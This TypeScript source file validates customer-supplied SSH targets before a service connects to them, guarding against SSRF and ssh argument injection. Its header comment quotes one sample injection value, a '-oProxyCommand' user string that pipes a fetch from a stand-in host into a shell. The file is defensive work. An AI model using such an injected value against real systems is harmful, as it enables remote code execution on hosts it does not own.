// SSH-pull enroll target (#886) — the box coordinates a customer hands us so the
// MOTHERSHIP can dial in and run the join bootstrap for them.
//
// This inverts the fleet plane's usual posture (boxes dial OUT; we trust nothing
// inbound), so the target is the least-trusted input we accept anywhere: an
// account-controlled host that our own cluster then opens a socket to. Two
// classes of abuse have to be closed before any of it reaches `ssh`:
//
//   1. SSRF / lateral movement — `localhost`, RFC1918, link-local (169.254 cloud
//      metadata), CGNAT, `.internal`. Reuses `isForbiddenSinkHost`, the ONE
//      blocklist every cluster-egress caller shares; a second copy would drift
//      into a hole.
//   2. Argument injection — `ssh` takes options positionally, so a `user` of
//      `-oProxyCommand=curl evil.sh|sh` or a host of `-D` becomes a FLAG, not a
//      login name, the moment it is passed through. We never build a shell
//      string (the runner spawns an argv array), but a leading `-` would still
//      be parsed as an option by ssh itself, so the shape gate is the fence.
//
// Pure + synchronous — no DNS, no sockets. A public NAME that RESOLVES private
// is the rebind case and belongs to the caller's async gate, exactly as the
// log-sink probe documents.

import { z } from 'zod';
import { isForbiddenSinkHost } from './host-vetting';

/** POSIX-ish login name: starts alphanumeric, then alphanumerics / `_` / `-` / `.`. Never a flag. */
const SSH_USER_RE = /^[a-z0-9][a-z0-9._-]{0,31}$/i;

export const SshTargetSchema = z.object({
  /** Hostname or address literal we dial. Vetted by {@link vetSshTarget}, never trusted raw. */
  host: z.string().min(1).max(253),
  /** TCP port. Defaults to 22. */
  port: z.number().int().min(1).max(65_535).default(22),
  /** Login name on the box. NOPASSWD sudo is the customer's side of the contract. */
  user: z.string().min(1).max(32),
});
export type SshTarget = z.infer<typeof SshTargetSchema>;

/** Why a target was refused — a closed set, so the API surfaces one legible line. */
export type SshTargetRefusal =
  | 'host_forbidden'
  | 'host_malformed'
  | 'user_malformed'
  | 'port_invalid';

export type SshTargetVerdict = { ok: true } | { ok: false; reason: SshTargetRefusal };

/**
 * Gate one SSH target before ANY socket is opened to it. Fails closed: anything
 * that isn't plainly a public host + a plain login name is refused.
 */
export function vetSshTarget(target: SshTarget): SshTargetVerdict {
  if (!Number.isInteger(target.port) || target.port < 1 || target.port > 65_535) {
    return { ok: false, reason: 'port_invalid' };
  }
  // A flag-shaped or whitespace-bearing host never reaches `ssh` as a host.
  if (/^-|\s/.test(target.host)) return { ok: false, reason: 'host_malformed' };
  if (!SSH_USER_RE.test(target.user)) return { ok: false, reason: 'user_malformed' };
  if (isForbiddenSinkHost(target.host)) return { ok: false, reason: 'host_forbidden' };
  return { ok: true };
}

/**
 * Human-legible refusal text — one line, safe to hand back over the API.
 *
 * PLAIN TEXT, no markdown: this string is the problem `detail` and the dashboard
 * renders it verbatim into an alert, where backtick-quoting shows up as literal
 * backticks (#1102).
 */
export const SSH_TARGET_REFUSAL_DETAIL: Record<SshTargetRefusal, string> = {
  host_forbidden: 'host resolves to a private, loopback, link-local or metadata address',
  host_malformed: 'host is not a plain public hostname or address literal',
  user_malformed:
    'user must be a plain login name — letters, digits, dots, underscores and hyphens only',
  port_invalid: 'port must be between 1 and 65535',
};

/**
 * Which submitted field a refusal is ABOUT (#1102) — so the field error rides the
 * input the operator has to fix, not whichever one the caller hardcoded. Lives
 * next to the sentence so the two can't drift, and keyed on `SshTarget` so
 * renaming a field breaks the build instead of misfiling the error.
 */
export const SSH_TARGET_REFUSAL_FIELD: Record<SshTargetRefusal, keyof SshTarget> = {
  host_forbidden: 'host',
  host_malformed: 'host',
  user_malformed: 'user',
  port_invalid: 'port',
};
